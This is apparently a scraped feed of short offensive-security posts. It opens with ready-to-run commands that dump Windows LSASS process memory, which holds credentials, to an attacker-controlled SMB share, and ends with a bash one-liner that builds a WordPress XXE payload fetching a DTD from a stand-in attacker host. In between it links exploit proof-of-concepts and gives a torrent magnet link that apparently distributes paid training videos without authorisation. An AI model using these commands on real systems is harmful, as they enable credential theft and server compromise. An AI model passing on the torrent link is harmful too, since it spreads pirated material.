Remote LSASS dump without touching local disk? Yes :)
On target run:
1) net use x: \\smbserver_under_your_control\c$\
2) powershell -c rundll32.exe C:\windows\System32\comsvcs.dll MiniDump (Get-Process lsass).id x:\lassdump.bin full

Our latest blog post explores vulnerabilities and possible Apple copyright violations in Cellebrite's software:

"Exploiting vulnerabilities in Cellebrite UFED and Physical Analyzer from an app's perspective"

-signal

CVE-2021-26415
https://www.cloaked.pl/2021/04/cve-2021-26415/

GitHub - lennartkoopmann/nzyme: Nzyme is a free and open next-generation WiFi defense system. Go to www.nzyme.org for more information.
https://github.com/lennartkoopmann/nzyme#getting-started

GitHub - Pai-Po/CVE-2021-1732: CVE-2021-1732 poc & exp; tested on 20H2
https://github.com/Pai-Po/CVE-2021-1732

Advanced Web Attacks and Exploatation 2020

about

https://www.offensive-security.com/offsec/awae-2020-update/

https://www.exploit-db.com/advanced-web-attacks



magnet:?xt=urn:btih:2ED593EA8EEA4AC9A39B30B07A7C45E788D78068&dn=AWAE%20Video%202020&tr=udp%3a%2f%2ftracker.openbittorrent.com%3a80%2fannounce&tr=udp%3a%2f%2ftracker.opentrackr.org%3a1337%2fannounce

Now might be a good time to make sure you have local copies of all the offensive security tools on GitHub

CVE-2021-29447 #WordPress XXE: you don't need a wave file to set iXML metadata! bash:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://attacker/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav